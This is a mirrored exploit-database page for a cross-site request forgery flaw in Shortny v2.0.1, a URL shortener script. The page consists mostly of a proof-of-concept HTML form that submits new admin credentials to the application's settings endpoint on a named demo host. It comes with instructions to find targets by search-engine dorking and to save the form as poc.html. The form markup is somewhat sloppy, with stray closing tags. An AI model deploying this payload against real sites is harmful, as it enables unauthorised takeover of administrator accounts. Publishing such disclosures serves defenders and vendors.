Advertisement


Looking for a fix? Check your Codebase security with multiple scanners from Scanmycode.today


Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019020082

Below is a copy:

Shortny v2.0.1 - The URL Shortener CSRF Vulnerability
====================================================================================================================================
| # Title     : Shortny v2.0.1 - The URL Shortener CSRF Vulnerability                                                              |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Franais V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            | 
| # Vendor    : https://codecanyon.net/item/shortny-the-url-shortener/8173515                                                      |  
| # Dork      : n/a                                                                                                                |
====================================================================================================================================


poc :

[+] Dorking n Google Or Other Search Enggine.

[+] Save as poc.html .

[+] 
                    <div class="tab-pane fade active in" id="admin">
                        <div class="col-lg-10 col-lg-offset-1">
                            <form role="form" action="https://demo.condize.net/shortny/admin/settings.php?op=admin" method="post" class="has-validation-callback">

                                <div class="form-group">
                                    <label for="username">
                                        Admin Username
                                    </label>
                                    <div class="input-group">
                                        <span class="input-group-addon">
                                            <i class="fa  fa-user form-control-feedback"></i>
                                        </span>
                                        <input type="text" value="admin" name="username" id="username" class="form-control">
                                    </div>
                                </div>
                                <div class="form-group">
                                    <label for="password">
                                        Admin Password 
                                    </label>
                                    <div class="input-group">
                                        <span class="input-group-addon">
                                            <i class="fa  fa-key form-control-feedback"></i>
                                        </span>
                                        <input type="password" name="pass_confirmation" id="password" class="form-control">
                                    </div>
                                </div>
                                <div class="form-group">
                                    <label for="InputName">
                                        Re-enter Password 
                                    </label>
                                    <div class="input-group">
                                        <span class="input-group-addon">
                                            <i class="fa  fa-key form-control-feedback"></i>
                                        </span>
                                        <input type="password" data-validation="confirmation" name="pass" data-validation-error-msg=" " id="password_confirmation" class="form-control">
                                    </div>
                                </div>

                                <input type="submit" name="submit" id="submit" value="Submit" class="btn btn-info pull-right">
                            </form>                
                        </div>
                    </div>
                </div>
            </div>


Greetings to :=========================================================================================================================
                                                                                                                                      |
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |        
                                                                                                                                      |
=======================================================================================================================================

Copyright ©2019 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.